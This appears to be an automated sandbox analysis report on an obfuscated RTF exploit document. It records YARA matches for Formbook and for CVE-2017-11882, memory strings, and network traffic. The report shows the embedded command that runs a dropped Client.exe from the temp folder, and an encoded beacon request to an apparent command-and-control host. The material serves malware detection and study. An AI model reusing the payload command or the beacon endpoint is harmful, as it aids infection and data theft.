Source: explorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 0000000A.00000000.976786692.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1004626983.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 0000000A.00000000.978377131.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1010833057.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.993943393.0000000008611000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner1SPS0
Source: explorer.exe, 0000000A.00000000.1010360758.0000000008521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.995439916.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979257547.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.950353171.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.994846785.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979787030.000000000880D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.992888492.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1011293822.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.993114505.0000000008521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1010156944.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.976835880.00000000084D2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 0000000A.00000000.1029291046.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.986329833.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.958357895.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1004626983.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerq
Source: explorer.exe, 0000000A.00000000.988586812.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1006236115.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.968187098.0000000004385000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerv
Source: explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4AB22E69-27EE-49FB-B577-3348055FCC0D}.tmpJump to behavior
          Source: unknownDNS traffic detected: queries for: www.magadirect.co.uk
          Source: global trafficHTTP traffic detected: GET /aekc/?p6A=k0tTOTrAn50YQe1h4ozxDNX4wd5+O6pkKrWAMwmyhhYwJBfC5YpDY/r3FGLgLX7DF3fRHoVtyXQnCSOz0Ea/6qte5rYurCT1UmXBzRE=&xjRt=ZvcPNdzxaTTX6DM HTTP/1.1Host: www.magadirect.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /2014/sqlite-dll-win32-x86-3080700.zip HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.sqlite.orgConnection: Keep-Alive
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWindow created: window name: CLIPBRDWNDCLASS

          E-Banking Fraud

          Source: Yara match | File source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: Client.exe PID: 2948, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: notepad.exe PID: 2496, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: NAPSTAT.EXE PID: 204, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp, type: DROPPED | Matched rule: EXP_potential_CVE_2017_11882 Author: ReversingLabs
          Source: ~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp.0.dr | Stream path '_1721465586/\x1Ole10Native' : z....Client.exe.C:\Path\Client.exe.........C:\Path
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\Client.exe
          Source: ~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp.0.dr | Stream path '_1721465588/Equation Native' : ...............\.[.............ZZCmD.exe /C %tmp%\Client.exe A..C................................................................................................................
          Source: Client.exe.0.dr | Static PE information: section name: (empty)
          Source: Client.exe | Static RTF information: Object: 0 Offset: 0000128Dh Client.exe
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf, type: SAMPLEMatched rule: MAL_RTF_Embedded_OLE_PE date = 2018-01-22, author = Florian Roth, description = Detects a suspicious string often used in PE files in a hex encoded object stream, reference = https://www.nextron-systems.com/2018/01/22/creating-yara-rules-detect-embedded-exe-files-ole-objects/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
